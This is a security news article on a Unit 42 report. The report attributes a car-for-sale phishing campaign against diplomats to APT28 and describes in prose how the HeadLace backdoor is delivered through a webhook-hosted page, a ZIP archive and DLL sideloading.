A Russia-linked threat actor has been associated with a recent campaign that utilized a car for sale as a phishing tactic to distribute a modular Windows backdoor named HeadLace.
“The campaign likely targeted diplomats and began as early as March 2024,” Palo Alto Networks Unit 42 stated in a report published today, linking it with medium to high confidence to APT28, also known as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.
It is important to note that the car-for-sale phishing lure themes have been previously used by another Russian nation-state group called APT29 since July 2023, suggesting that APT28 is repurposing successful strategies for its own campaigns.
Earlier in May, the threat actor was implicated in a series of campaigns targeting networks across Europe with the HeadLace malware and credential-harvesting web pages.
The attacks are characterized by the utilization of a legitimate service known as webhook[.]site – a signature of APT28’s cyber operations along with Mocky – to host a malicious HTML page, which initially checks if the target machine runs on Windows and provides a ZIP archive for download (“IMG-387470302099.zip”).
If the system is not Windows-based, it redirects to a decoy image hosted on ImgBB, specifically an Audi Q7 Quattro SUV.
The archive contains three files: The genuine Windows calculator executable disguised as an image file (“IMG-387470302099.jpg.exe”), a DLL (“WindowsCodecs.dll”), and a batch script (“zqtxmo.bat”).
The calculator binary is used to load the malicious DLL, a component of the HeadLace backdoor designed to execute the batch script, which then runs a Base64-encoded command to fetch a file from another webhook[.]site URL.
This file is saved as “IMG387470302099.jpg” in the users’ downloads folder and renamed to “IMG387470302099.cmd” before execution, after which it is removed to erase any traces of malicious activity.
“While the infrastructure used by Fighting Ursa varies for different attack campaigns, the group frequently relies on these freely available services,” Unit 42 stated. “Furthermore, the tactics from this campaign align with previously documented Fighting Ursa campaigns, and the HeadLace backdoor is unique to this threat actor.”
